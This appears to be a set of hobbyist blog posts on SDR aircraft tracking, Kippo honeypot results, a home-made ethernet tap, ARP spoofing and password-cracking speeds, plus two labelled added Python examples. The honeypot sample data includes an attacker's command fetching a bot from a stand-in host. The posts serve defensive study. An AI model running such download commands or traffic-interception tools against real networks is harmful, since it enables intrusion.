RasPi + SDR + ADS-B = awesome

A lot of people have combined a RasPi and an SDR dongle to get a low-power-consumption ADS-B tracker. Tomasz Miklas has created an image for the Raspberry Pi with everything needed to run your own aircraft tracking “service” already set up. I’ve finally had a chance to experiment with it and this will be my short review.

First of all, I have to say I’m really sorry to Tomasz, because he sent me the image on the 10th of October to test it out before releasing it publicly and I’m posting this two months later. Sorry mate.

Tomasz has a well-written post explaining how the image works, so I’ll skip the details. All tests were performed using a dongle with an R820T chip and the stock omnidirectional antenna. Since I moved recently, I didn’t have the time to construct a proper antenna, yet even with such an antenna the results were pretty good.

So, you download the image, `dd` it to an SD card, plug in your SDR dongle, power it on, point your browser to the IP the RasPi obtained through DHCP and … everything simply works out of the box. At least it did for me.

I was really surprised by how lightweight the whole setup was. After one and a half hours of uptime, two clients connected to the server and, receiving messages from two planes, the RasPi reported that it only used 30 megs of RAM and the CPU was pinned at 35% the whole time, with 4-5% of it being htop itself. The process using the CPU was of course dump1090, which does all the heavy lifting. Unfortunately, due to the time I tested the image (4 AM) and my location, there weren’t many planes (two simultaneously at max), so I don’t know how dump1090 behaves under a lot of load/traffic.

As mentioned above, I was using the stock antenna that came with the SDR dongle, but I was still able to get a signal from planes that were 72 km away on average! On some of my previous tests under Windows and ADSB#, I only got 28 km of range. A lot of things have changed since then though, mainly my new house and my antenna placement, or perhaps the old one was a Faraday cage? Either way, for the time being, I’ll leave the RasPi running and report further on its performance after a bit of testing.

If you own a RasPi and an SDR dongle, give the image a try. It may not be something you haven’t seen or done already, but it certainly is the easiest way to monitor ADS-B traffic, at least to my knowledge. I know I’ll be keeping a copy of the image on an SD card because it’s so handy.

An intro to SDR

For the past two months I’ve been reading about SDR and everything related to radio telecommunications. For those that don’t know what SDR is (and are too bored to click the previous link), Software Defined Radio is a system that implements hardware subsystems of a typical radio in software. People have been designing their own SDRs with FPGAs for quite some time now, but in the last year there has been a huge “revolution”. It turns out that a lot of cheap USB digital TV tuners based on the Realtek RTL2832U chip can be tuned over a wide range of frequencies.

For a list of supported devices you can check this page. I’ve bought two devices to experiment with: one is an EzTV 645 using the FC0013 chip, while the other one uses the Rafael Micro R820T chip (bought it from ebay for about 8 euro). I mainly bought them to experiment with ADS-B and NOAA weather satellites. Due to university assignments I didn’t have the time for the latter, but I’ve spent some mornings watching airplanes taking off and landing at a nearby airport. Other interesting things to listen to are: ATC, ATIS, pager traffic, car keyfobs and anything else within your chip’s tuning range. As mentioned earlier, due to the lack of time, for the time being I’ve only experimented with ADS-B traffic.

I’ve done all my testing on Windows 7 using SDR# and ADSB# in conjunction with Virtual Radar Server. So far, using the stock antenna with both dongles, the one with the R820T is performing way better than the FC0013 one. There is less noise and it’s better at picking up signals from afar. Moreover, it has a better tuning range, although that differs from dongle to dongle and depends more or less on your luck.

I live fairly close to an airport so I get a good signal from any plane taking off or landing. The maximum range I’ve achieved with the R820T dongle and stock antenna (omnidirectional) is 28 km. I’ve checked the results I get against flightradar24.com and they are spot on. One feature of ADSB# I like is the ability to share your findings with servers that accept ADS-B feeds, for example by contributing to flightradar24.com.

I won’t go into more detail at the moment, since I’m tight on time, but for those of you that are interested in getting an SDR-capable dongle, do some research first. Not all dongles have what is called an ESD protection diode. As its name implies, it’s a diode (a passive component allowing current to flow in one direction only, like a check valve) that protects against electrostatic discharge. A lot of people have “fried” their dongles because they didn’t have said diodes. By leaving the antenna outside, the wind can create static charge on the antenna and fry the chip inside the dongle. Both of my dongles came with those diodes, but if you plan on buying one, read some comments first or, if buying from ebay, ask the seller for a picture of the dongle. The diodes are the little black things I’ve circled in red near the antenna connector.

For those of you that want more info on ADS-B I suggest watching this amazing talk by Render Man (http://www.renderlab.net).

[Images: EzTV645 ESD diode; EzTV645 dongle; ESD diode and R820T chip]

My Kippo findings after three months

Three months ago I installed Kippo on a low-end VPS of mine. About a month after that, I got bored of manually checking Kippo every day so I made a small script to automate the process. Fast forward another two months and here we are.

In three months’ time, I had 122.487 bruteforce attempts from 339 different IPs. Of said attempts, 130 succeeded in guessing the correct password(s). I set up Kippo to accept two different easy-to-guess passwords for the root account. People interacted with the honeypot (as in logged in and tried to download files, etc.) only 16 times out of those 130. The rest were just bots logging in and logging out.

The first command every attacker runs after logging in is `w`, followed by `cat /proc/cpuinfo`. Ten out of the sixteen attackers logged out after seeing the results of /proc/cpuinfo. I guess people know about Kippo and recognize it by /proc/cpuinfo. After noticing that, I changed mine, something I suggest everyone do, as Kippo by default is easily identified. There were a few hits where people thought it was an actual server and not a honeypot and tried downloading some of their tools. I disabled `wget` but made it look like it’s there, so it was funny seeing them trying to figure out why they couldn’t download their files.

Unfortunately, I haven’t come across any new web shell; only some IRC bots, so nothing interesting to post about there.

Of the 122.487 previously mentioned attempts, I’ve gathered 30.048 unique passwords (around 29.500 if you don’t count extra whitespace) and 8.525 usernames. I ran both the password and the username lists through pipal. By far (49.12%) the most used username is root, followed by test (0.8%).

For more details on both of the reports check my Kippo findings page.

Making an (ugly) ethernet tap

A long time ago, I saw this in the Hak5 store. After reading about it in mossmann’s blog, I found it somewhat interesting that using this easily built device you can HACK THE PLANET.

An ethernet tap is a passive device used to monitor traffic between two hosts using a third one. For more info on network taps read here.

The idea behind it is very simple, but in order to understand it we must first understand how data is transmitted through the ethernet cable. The ethernet cable, commonly called Cat 5, contains four pairs of twisted wires. 100BASE-TX (Fast Ethernet) only uses two of these pairs, one pair for transmitting data (TX) and one for receiving (RX). So, in order to intercept the data sent from one of the hosts, we just need to connect the host’s TX line to our RX one. Likewise, to intercept incoming data to the host, we need to connect the host’s RX line to our RX line.

Note that we can’t connect both the host’s TX and RX to the same RX line, since Fast Ethernet is full duplex. To overcome this we need to use two taps, one for the received data and one for the transmitted.

(For more details on how to make one, read these two posts: #1, #2)

After a bit of soldering, this is what I ended up with.

Top view of the ethernet tap (euro coin is for size comparison)

Bottom view of the ethernet tap

The two ports near the euro coin are to be connected to the PC and the router, while the other two ports are for intercepting the traffic. As stated previously, one is for the transmitted data and the other for the received. To use them both at once, you need either a PC with two network cards or a USB-to-Ethernet adapter.

Link overflow

I’ve been in assignment hell for the past two months, thus haven’t really posted anything. To make things even worse, I got sick four days ago. Not thinking too clearly while sick, I ended up watching a lot of Defcon/Shmoocon talks and reading a lot of posts. Well, that and DotA 2 :P

I’ll link the talks that I enjoyed the most.

RFID

All three talks are by Kristin Paget (formerly known as Chris Paget), with the first one being the scariest for me. Having the ability to read 900 MHz RFID tags from afar is, at the very least, intimidating.

Lockpicking

Lockpicking has always fascinated me and recently I started looking more and more into it. Schuyler Towne is an amazing speaker who really knows how to captivate a crowd. Moreover, he has an excellent lockpicking series on YouTube for anyone interested.

General pentesting

Random talks

Kippo-log.sh – A way to easily get information from kippo

As I continued my adventures with Kippo, I got tired of manually reviewing daily activity by querying MySQL tables. As shown here, in an excellent post by Ion, there are a lot of scripts/web apps/one-liners to get various bits of information from Kippo. Since none of them seemed to do what I had in mind, I created kippo-log.sh.

Its purpose is simple. Print a bunch of info like:

  • Total log in attempts
  • Total unique passwords tried
  • The number of log in attempts since the last execution of the script and how many of them were successful, as well as the number of actual sessions (not just random “drive bys” by bots).

Since I had disabled “wget” in my installation, I needed a quick way to see what files the attackers had tried to download. This can be accomplished with the flag -f X, where X is a number. With the -f option, the script prints the URLs of files the attackers tried to fetch with wget in the last X days.

If I find the time, I might add a couple more features. For now, though, it’s more than enough for my needs.

Update: I added two more flags -p X and -u X, where X is a number.

-p will print the X most used passwords, while -u will print the X most used usernames.
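As an added example (not the author’s kippo-log.sh), here is the same set of statistics computed in Python over a simplified copy of Kippo’s MySQL tables, rebuilt in SQLite with constructed sample rows so it runs offline; the table and column names are assumptions and may not match a given Kippo version.

```python
import sqlite3
from datetime import datetime, timedelta

# Assumed, simplified version of Kippo's MySQL tables (names may differ in practice).
SCHEMA = """
CREATE TABLE auth (session TEXT, success INTEGER, username TEXT, password TEXT, timestamp TEXT);
CREATE TABLE input (session TEXT, timestamp TEXT, input TEXT);
CREATE TABLE downloads (session TEXT, timestamp TEXT, url TEXT);
"""
# Constructed sample data: s1 is a real interactive session, s2 is a bot drive-by.
AUTH = [("s1", 0, "root", "toor", "2013-03-01 04:00:01"),
        ("s1", 1, "root", "123456", "2013-03-01 04:00:03"),
        ("s2", 0, "admin", "admin", "2013-03-02 04:10:01"),
        ("s2", 1, "root", "123456", "2013-03-02 04:10:02")]
INPUT = [("s1", "2013-03-01 04:00:10", "w"),
         ("s1", "2013-03-01 04:00:15", "cat /proc/cpuinfo"),
         ("s1", "2013-03-01 04:00:40", "wget http://example.invalid/bot.tgz")]
DOWNLOADS = [("s1", "2013-03-01 04:00:40", "http://example.invalid/bot.tgz")]

def load_sample():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    db.executemany("INSERT INTO auth VALUES (?,?,?,?,?)", AUTH)
    db.executemany("INSERT INTO input VALUES (?,?,?)", INPUT)
    db.executemany("INSERT INTO downloads VALUES (?,?,?)", DOWNLOADS)
    return db

def one(db, sql, *args):
    return db.execute(sql, args).fetchone()[0]

def summary(db, since):
    """Totals, plus activity since the last run ('since' is a timestamp string)."""
    return {
        "attempts": one(db, "SELECT COUNT(*) FROM auth"),
        "unique_passwords": one(db, "SELECT COUNT(DISTINCT password) FROM auth"),
        "attempts_since": one(db, "SELECT COUNT(*) FROM auth WHERE timestamp > ?", since),
        "successful_since": one(db, "SELECT COUNT(*) FROM auth WHERE success = 1 AND timestamp > ?", since),
        # a "real" session is one where the attacker typed something, not a bot drive-by
        "sessions_since": one(db, "SELECT COUNT(DISTINCT session) FROM input WHERE timestamp > ?", since),
    }

def downloads_last_days(db, days, now):
    """URLs wget was pointed at in the last `days` days (the -f flag)."""
    cutoff = (now - timedelta(days=days)).strftime("%Y-%m-%d %H:%M:%S")
    rows = db.execute("SELECT url FROM downloads WHERE timestamp > ? ORDER BY timestamp", (cutoff,))
    return [url for (url,) in rows]

def top(db, column, n):
    """The n most used usernames or passwords (the -u / -p flags)."""
    assert column in ("username", "password")  # column name is interpolated, so whitelist it
    sql = f"SELECT {column}, COUNT(*) AS c FROM auth GROUP BY {column} ORDER BY c DESC, {column} LIMIT ?"
    return db.execute(sql, (n,)).fetchall()
```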

Having fun with Kippo

A couple of days ago I installed Kippo on a VPS with 128 MB of RAM. I’m not gonna post how to install and set up Kippo, as there are a gazillion posts about it already (two of the best: #1, #2). What I’m gonna post is how to keep it lightweight, what I like about it and some early results.

Keeping it lightweight

If you plan on using MySQL to log everything, keep in mind that, by default, MySQL is kind of a memory beast. In order to reduce its memory consumption, I edited “/etc/mysql/my.cnf”, which is the global configuration file for MySQL. In Debian, you can find example configuration files in “/usr/share/doc/mysql-server-????/”, where ???? is your MySQL version number. The file called my-small.cnf is suitable for servers with less than 64 MB of RAM, so that’s the one I used. I also added “skip-innodb” as an option.

For those of you that want a web server installed, I recommend using nginx instead of Apache as it needs less resources to run.

At the moment, with the system running what it needs + nginx + MySQL + Kippo, it only uses 68 MB of RAM.

What I like about Kippo

  • It’s dead simple to have it up and running.
  • It records everything the attacker types, exactly the way he types it. That includes any typos he makes and corrects with backspace, and even his typing speed.
  • Any files the attacker downloads are saved locally for further inspection.
  • You can add any files you want to its fake filesystem so that it looks like a real machine with a lot of users etc.

How about some early results

I started running Kippo three days ago. So far, I’ve had 3915 attempts at logging in. Four of them were successful, but only in one of them did someone interact with the honeypot. This page will be updated every Monday with some of the most interesting findings. For the time being, it has a list containing all the usernames/passwords tried so far (duplicates included), sorted by username.

Arp spoofing with Python

I decided to reinvent the wheel by making an ARP spoofer in Python using raw packets, thinking it would be nice practice.

What is ARP, ARP spoofing/poisoning, ARP cache?? How do they work and why should we care? Since all of these things have been written and explained before, in a better way than I could explain them, here you go.

You can find the script here. It’s more like a proof of concept than a fully working program, since I haven’t really tested it in more than two computers, so I don’t know if it’ll work for sure. Its purpose is purely instructional. The script is licensed under the MIT license so you are free to change/modify it to your heart’s content.

Thoughts on password hashing, salted passwords and CrackStation.net

Recently, I was messing around with password hashes and I stumbled upon a (new) interesting hash cracking site, CrackStation.net. CrackStation has the largest hash database I’ve seen and uses binary search over sorted hash lookup tables, so it’s really fast. To get a sense of the size of its hash database, the lookup table for md5 contains 15,171,326,912 entries (190 GB in size!!).

I guess all of you have heard about how eHarmony.com, LinkedIn.com and Last.fm had part of their databases leaked online. The funny thing is, none of the three sites salted their users’ passwords. As described here, salting each password with a unique salt prevents cracking the hashes by using rainbow tables.

As examples of CrackStation’s power, it was able to crack 275,860 and 31,831 hashes from the eHarmony and LinkedIn leaks respectively.

But is that all? I remember reading Jeff Atwood’s “Speed Hashing”, an article about the speed of calculating hashes nowadays, a while back. With two ATI Radeon 7970s and oclHashcat he was able to calculate 16.000 million md5 hashes per second. That means it takes 4 minutes to try all 7-character passwords containing uppercase, lowercase and numbers. In some cases, people have even reported 23.000 million hashes per second, i.e. 2.55 minutes for all 7-character passwords or 2.63 hours for all 8-character passwords.

According to “Analyzing the LulzSec Password Leak” (an analysis of 62.000 passwords released by Lulzsec last year), the average password is ~7.5 chars long and 43% of the passwords use only lowercase characters. That means, with 23.000 million h/s and 8-character passwords, we need 9 seconds to try all possible combinations. Even worse, 20% of the passwords contained only numbers, meaning 0.004 seconds for 8-character passwords. So even if the passwords were salted, it would be pretty easy and fast to crack them by brute force.
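To check the arithmetic behind these figures, here is an added example (not from the original post) that computes worst-case exhaustive-search times from alphabet size, password length and hash rate, shows why a per-user salt only multiplies the work by the number of users, and models an iterated KDF such as PBKDF2 under the assumption that cost scales linearly with the iteration count.

```python
def keyspace(alphabet_size, length):
    """Number of candidate passwords of exactly `length` characters."""
    return alphabet_size ** length

def seconds_to_exhaust(alphabet_size, length, hashes_per_second, iterations=1):
    """Worst-case time to try every candidate at the given hash rate.
    `iterations` models an iterated KDF (PBKDF2-style): each guess costs
    `iterations` underlying hash computations, so the effective guess rate
    drops by that factor (assumption: linear scaling, ignoring GPU tricks)."""
    return keyspace(alphabet_size, length) * iterations / hashes_per_second

def leak_search_seconds(n_users, alphabet_size, length, hashes_per_second, salted):
    """Time to exhaust the keyspace against a leaked database. Unsalted, every
    candidate hash is compared against all users at once, so one pass suffices;
    with unique per-user salts the whole search must be repeated per user."""
    single = seconds_to_exhaust(alphabet_size, length, hashes_per_second)
    return single * n_users if salted else single

# Character classes used in the post's figures.
LOWER, DIGITS, MIXED_ALNUM = 26, 10, 26 + 26 + 10

def page_figures(hashes_per_second=23e9):
    """Reproduce the post's cases at the given fast-hash rate (hashes/s)."""
    return {
        "7 chars, mixed alnum (minutes)": seconds_to_exhaust(MIXED_ALNUM, 7, hashes_per_second) / 60,
        "8 chars, mixed alnum (hours)": seconds_to_exhaust(MIXED_ALNUM, 8, hashes_per_second) / 3600,
        "8 chars, lowercase only (s)": seconds_to_exhaust(LOWER, 8, hashes_per_second),
        "8 chars, digits only (s)": seconds_to_exhaust(DIGITS, 8, hashes_per_second),
    }

if __name__ == "__main__":
    for label, value in page_figures().items():
        print(f"{label}: {value:.3f}")
    # Salt alone: 1000 users with unique salts cost 1000x the unsalted search.
    print("1000 salted users, 8 lowercase chars (s):",
          leak_search_seconds(1000, LOWER, 8, 23e9, salted=True))
    # A slow KDF changes the per-guess cost itself (100000 iterations, same rate).
    print("8 lowercase chars, 100000-iteration KDF (days):",
          seconds_to_exhaust(LOWER, 8, 23e9, iterations=100000) / 86400)
```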

To sum up, unsalted passwords are certainly a big no-no, while salted passwords with today’s hardware are only as good as the complexity of the password itself. What websites should do is enforce good password policies (what NOT to do: #1, #2) and use a hashing algorithm that was created exclusively for password hashing (like scrypt/bcrypt/PBKDF2). Those functions salt the passwords on their own. If, for some reason, a hash function that doesn’t include a salt by default is used (md5, sha1, sha-256, etc.), you should salt the passwords on your own.

Two random TED talks I enjoyed

Here are two TED talks I really enjoyed.

The first one is by Vijay Kumar, whose team is working on autonomous and agile quadrotors.

The second one is by Dennis Hong of RoMeLa showcasing some of their amazing work.